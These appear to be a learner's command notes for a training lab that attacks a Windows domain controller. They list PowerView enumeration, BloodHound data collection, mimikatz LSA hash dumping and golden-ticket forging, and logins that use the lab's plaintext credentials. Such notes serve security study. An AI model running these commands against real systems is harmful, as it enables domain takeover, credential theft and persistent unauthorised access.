=================================
10.201.116.9 -- domain.com -- win/lin x32/x64
=================================
vpn-connect
echo 'export TARGET=10.201.116.9' >> ~/.zshrc && source ~/.zshrc
echo "$TARGET CONTROLLER" | sudo tee -a /etc/hosts

Your machine IP is 10.201.116.9
Username: Administrator
Password: P@$$W0rd
Domain Name: CONTROLLER

sshpass -p 'P@$$W0rd' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 Administrator@$TARGET

---

# https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
powershell -ep bypass
. .\Downloads\PowerView.ps1
Get-NetUser | select cn
Get-NetGroup -GroupName *admin*

---

powershell -ep bypass
. .\Downloads\SharpHound.ps1    
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

sshpass -p 'P@$$W0rd' scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null Administrator@$TARGET:20251024114727_loot.zip .
# Upload zipfile to Bloodhound
# http://127.0.0.1:8080/ui/login

.\SharpHound.exe -c All -d CONTROLLER.local --zipfilename loot_exe.zip
// unzip and upload to Bloodhound

# http://127.0.0.1:8080/ui/administration/file-ingest

---

cd Downloads
.\mimikatz.exe
privilege::debug

# Dump Hashes
lsadump::lsa /patch

# Golden Ticket
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
// open other command prompt to access other machines

---

xfreerdp3 /clipboard /dynamic-resolution /cert:ignore /v:$TARGET /u:Administrator /p:'P@$$W0rd' /drive:'/usr/share/windows-resources/mimikatz/x64',share